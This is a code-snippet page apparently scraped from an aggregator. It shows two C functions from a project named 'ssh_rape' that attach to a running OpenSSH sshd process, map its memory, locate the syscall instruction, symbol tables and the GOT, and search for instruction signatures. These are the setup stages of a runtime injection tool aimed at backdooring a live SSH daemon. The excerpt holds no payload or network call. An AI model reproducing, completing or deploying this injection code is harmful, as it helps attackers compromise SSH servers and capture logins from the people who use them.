示例#1
0
文件: sig.c 项目: sj0rz/ssh_rape
u64 lea_by_debugstr(inject_ctx *ctx, u8 lea_reg, char *str) {
	u64 lea_addr, str_addr;
	char leabuf[]="\x48\x8d\x00\x00\x00\x00\x00";
	int *rptr = (int*)&leabuf[3];
	int i, j;
	mem_mapping *mapping;

	leabuf[2] = lea_reg;

	str_addr = find_sig_mem(ctx, (u8*)str, strlen(str), MEM_R);

	if (str_addr == 0)
		error("could not locate str '%s'", str);

	for(i = 0; i < ctx->num_maps; i++) {
		mapping = ctx->mappings[i];

		if ((mapping->perm & (MEM_R | MEM_X)) != (MEM_R | MEM_X))
			continue;

		for(j = 0; j < mapping->size-7; j++) {
			*rptr = str_addr - (mapping->start+j+7);
			if (memcmp(mapping->data+j, leabuf, 7) == 0) {
				lea_addr = mapping->start+j;
			}
		}
	}

	return lea_addr;
}
示例#2
0
文件: inject.c 项目: blasty/ssh_rape
void inject_ctx_init(inject_ctx *ctx, pid_t pid) {
	int i;
	char sshd_path[255], proc_exe[64];

	info("you gave me pid %d\n", pid);

	ctx->pid = pid;
	ctx->debug = 0;
	_attach(ctx->pid);

	info("slurping stuff to memory..");

	// parse /proc/pid/maps
	map_init();

	ctx->num_maps = map_load_all(ctx);
	ctx->mappings = map_get();

	map_sort(ctx);

	info("loaded %d memory mappings", ctx->num_maps);

	// get full path to sshd binary from /proc/pid/exe link
	memset(sshd_path, 0, 255);
	sprintf(proc_exe, "/proc/%d/exe", ctx->pid);
	readlink(proc_exe, sshd_path, 255);
	info("sshd binary path = '%s'", sshd_path);

	// check if OpenSSH version is >= 7
	FILE *f = fopen(sshd_path, "rb");

	if (f == NULL) {
		error("could not open sshd binary ('%s')", sshd_path);
	}

	fseek(f, 0, SEEK_END);
	int sz = ftell(f);
	fseek(f, 0, SEEK_SET);

	char *sshd_buf = malloc(sz);
	fread(sshd_buf, sz, 1, f);
	fclose(f);

	ctx->uses_new_key_system = 1;

	for(i = 0; i < sz; i++) {
		if (memcmp(sshd_buf + i, "key_new: RSA_new failed", 23) == 0) {
			ctx->uses_new_key_system = 0;
			break;
		}
	}

	if (ctx->uses_new_key_system) {
		info("oh, we're dealing with an sshd that probably uses sshkey_* api..");
	}

	free(sshd_buf);

	// locate syscall instruction
	ctx->sc_addr = find_sig_mem(ctx, (u8*)"\x0f\x05", 2, MEM_R | MEM_X);
	info("syscall\t\t\t= \x1b[37m0x%lx", ctx->sc_addr);

	// load symtabs
	ctx->dynsym_sz = get_section(sshd_path, ".dynsym", &ctx->dynsym, &ctx->dynsym_base);
	ctx->dynstr_sz = get_section(sshd_path, ".dynstr", &ctx->dynstr, &ctx->dynstr_base);
	ctx->symtab_sz = get_section(sshd_path, ".symtab", &ctx->symtab, &ctx->symtab_base);
	ctx->strtab_sz = get_section(sshd_path, ".strtab", &ctx->strtab, &ctx->strtab_base);
	ctx->got_sz    = get_section(sshd_path, ".got",    &ctx->got,    &ctx->got_base);
  ctx->rela_plt_sz   = get_section(sshd_path, ".rela.plt",    &ctx->rela_plt,    &ctx->rela_plt_base);
  ctx->rela_dyn_sz   = get_section(sshd_path, ".rela.dyn",    &ctx->rela_dyn,    &ctx->rela_dyn_base);

	// cache all call instructions in executable regions
	cache_calltable(ctx);
}